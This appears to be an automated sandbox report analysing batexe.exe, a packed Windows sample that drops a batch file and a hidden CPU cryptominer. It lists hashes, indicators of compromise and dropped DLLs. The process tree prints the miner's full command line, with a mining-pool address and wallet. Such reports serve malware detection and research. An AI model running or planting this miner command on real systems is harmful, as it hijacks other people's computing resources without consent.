73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
299s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
22/02/2024, 13:16

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3724	b2e.exe
5016	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5016	cpuminer-sse2.exe
5016	cpuminer-sse2.exe
5016	cpuminer-sse2.exe
5016	cpuminer-sse2.exe
5016	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4328-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4328 wrote to memory of 3724	4328	batexe.exe	73
PID 4328 wrote to memory of 3724	4328	batexe.exe	73
PID 4328 wrote to memory of 3724	4328	batexe.exe	73
PID 3724 wrote to memory of 2484	3724	b2e.exe	74
PID 3724 wrote to memory of 2484	3724	b2e.exe	74
PID 3724 wrote to memory of 2484	3724	b2e.exe	74
PID 2484 wrote to memory of 5016	2484	cmd.exe	77
PID 2484 wrote to memory of 5016	2484	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4328
- C:\Users\Admin\AppData\Local\Temp\99BF.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\99BF.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\99BF.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9EEF.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2484
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\99BF.tmp\b2e.exe

Filesize
1011KB

MD5
bd907179051d84fa049f2febbe6a23c8

SHA1
b35d1db5221ad79ff9b7db38aea32038b755c84c

SHA256
a2de3070f4c620b4a85a1d01320342ef4b3ca4d2f8466b764c2ffc1ac96594d1

SHA512
987a5ba5e835b81b3e2e871c92b223f5aa7d48e812c37be4789927fe0a086e262ebe3649398a9e18e7dadd110d29c9b849311f7280626b347bf539f04ab1d142

Download Submit
C:\Users\Admin\AppData\Local\Temp\99BF.tmp\b2e.exe

Filesize
1.9MB

MD5
b5ae88e85e1084225ce0118ce701db12

SHA1
d4b5002d16549f82c16ef027005c52a58ec9d8c9

SHA256
0a02515a7262451015ed48e82191dfffcb03d31b76f1c8fca7ba337acfef9fe8

SHA512
5dafba51677f3348a2f19eeaa82142c9aeacba7b4e4d3a6c28bfaba21622842b30086a3036979f16da7a241419ca4c47752cd58a0e42f7c68aada32f59c48e45

Download Submit
C:\Users\Admin\AppData\Local\Temp\9EEF.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
262KB

MD5
22fe7523429983054d3013eaca9c0b24

SHA1
d9b32c712194c8d8c5b342a66dea256113b0bd73

SHA256
98deed4f7119af89c0ce918c0d169bc2adf61be5d7c0d4f922b552c9be1840b0

SHA512
a30dd53016a570afdb3c4cc1a32d348c48327510f8de93a2b960cfd5bc690f5e890a82579eb78d0f74106b1214d5a77fadb73bf4a92fb55cb88e2067b801a112

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
424KB

MD5
e694ec594325d8d9345e3370c4aa4238

SHA1
8f90a0d479f38ad434f1194daa40480c321ca455

SHA256
98d6e643c64e36f606be5d3e85e46fdb7b9fd8e9995b4c4fabd2b44325590f63

SHA512
dcfc5e4cd62b089c9aa92bb8da9354d9df9c94b1f8617ab52aa278883928ed28275291b3df36961e38a3257728b3fc388a44b7820be39b03e35816b94216a17b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
541KB

MD5
d367bfb33e7ed68d8b0c373e0e16397a

SHA1
a81e1a81188fb409c5d0281f1284345768a118f3

SHA256
1d2ca20379e2dd1eed380d90da05c7d86d46558e9ecd2cf80c999ec395e40fe9

SHA512
cb319203568fbc63ba2f318bdd0585c2ef460a95f631bffa8acd39e7396c6b11a5f1c0c1e5193b3b4a52a1f78a52c2b6bb42cb3e075c2fe4f1b2998f89c422bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
332KB

MD5
a09e5e8ca873848c42b34e0ed2b62215

SHA1
a30d405e68dea7f31ad2076270626794d5dc6e98

SHA256
22e90855b916e43f9dfa59fec6b306157c6871eede8019b550126f0fe9c3dbf9

SHA512
eea2c6d2187e982bcdf25be701d4734275fe7fe6e93417d3cb34add3c33013d2155effeb72b7b21a8801707113450aded050f6c89d9de2f2975a4426468e37d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
286KB

MD5
0a4c83159c439b9db29a2da1b48b8344

SHA1
f28333b359ccec55a30d2c2e4ddf7b0cf21c5082

SHA256
1d2536154349c4a61f032000ce78591de58866b77d586ecee01cf2730bd72b02

SHA512
dd126da5286bfc5a496e455cca5612f5b98d49b5e7a8594071387a1668e1cefdabd207b8e32716b0414bf85a9c5db10302e3c5d3fd0d173e648d684b71013f6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
222KB

MD5
574d6909b111d85740ea0c8e34a04391

SHA1
df354fcfcfd1fe8079753268e08774d8cfd733de

SHA256
93c033779f4e69a7f106495f99ccd2995da9c69881e6aa0782651bbe00a9e8ee

SHA512
0e4cb8b4ea1ebd727e376ffd295f145cf25e5e9136486c0be64a8014a85d446c05db9c3fb6ae4e03dd71fd285d453e8c549ccaee9448af62b1ab6ac34b5ea528

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
353KB

MD5
ecec79df105227810d38e0e531d434bd

SHA1
68b9788a4b84a62a295316c61418795482a2e09a

SHA256
3c6673f1254ca6ff236730715f2d4a1b23226b9d3339341c810c9580e284f4bc

SHA512
34924054e48db5296b87e6a5ae19c718095a2bfeff2a6d73b05c1f1efd1ecff501891fdcd73f3e0872985fc07d105f625bc30853195ea3692e047e2c4f02741b

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
260KB

MD5
5abde09d180df9c3a60befe38274793f

SHA1
bb71442fa575fee08ebbb3d7fbe7037312f8df86

SHA256
a43c45561b5f5b0347697bcb07a140ba7b4cfc8277f3b6467aaa3be436b2a512

SHA512
f2cd3831c61fe1abb8f2ad063d4a78658b19998697b17639e2e2f1914bd22eff3956f2da2c9b5b7528fe071d11fc6f6327c48ee6964438bf38e3f502a4b02f2f

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
3.8MB

MD5
3de1e17b3420d6ed55abf012dd51c383

SHA1
6241250a57bec543391492068675f910adb7eabd

SHA256
d885787573f86ba6eb59038733b9b051eb89ba6ad6b25763d90cf8b7cd2ce4d5

SHA512
c118a145fd373efe3252295ea48e82a5bba2e6fffda2582c5cdf1dd246b7d10a0bc8e3a485db8455d3f7a08ce3ade278f2a14206b5ab4f444885603be856a49f

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
4.0MB

MD5
e910b6730f4d4ec76c27c0dc85bed4a0

SHA1
96bd7e4c6120e63a8a8f69877c569c9a36682bcc

SHA256
2929c3d260e5db01fc4560fa7a1834f6f511829eae169e7ca0608ee5dad4ef39

SHA512
25687727534bf7d1241caee9faf8b10b09a21510967a460c90b87e709dc38736c07e100ba76841e76de26ba6890e99a661471d6a19948de018cb6f7a00f808f3

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
238KB

MD5
7bced8d27b7fc987103aa577c8a1c4be

SHA1
986ccea09339de7de9854e5b2bb17a0d84bfbfb7

SHA256
70e87b9fa15416d9946a56aa2cd2c461b5a742776d6d2f193966751a763e79b9

SHA512
79dad91948af8d842e698c2826894cca7781564056113d32581e58ca8fe5c52479f778d851dde2aaa5d5f04868c8ff3beb8732aafe7e58de7fb05b777e01fc29

Download Submit
memory/3724-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3724-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4328-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5016-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5016-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5016-43-0x00000000724C0000-0x0000000072558000-memory.dmp

Filesize
608KB

Download
memory/5016-44-0x0000000001150000-0x0000000002A05000-memory.dmp

Filesize
24.7MB

Download
memory/5016-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5016-53-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5016-58-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5016-63-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5016-68-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5016-78-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5016-83-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5016-93-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5016-98-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download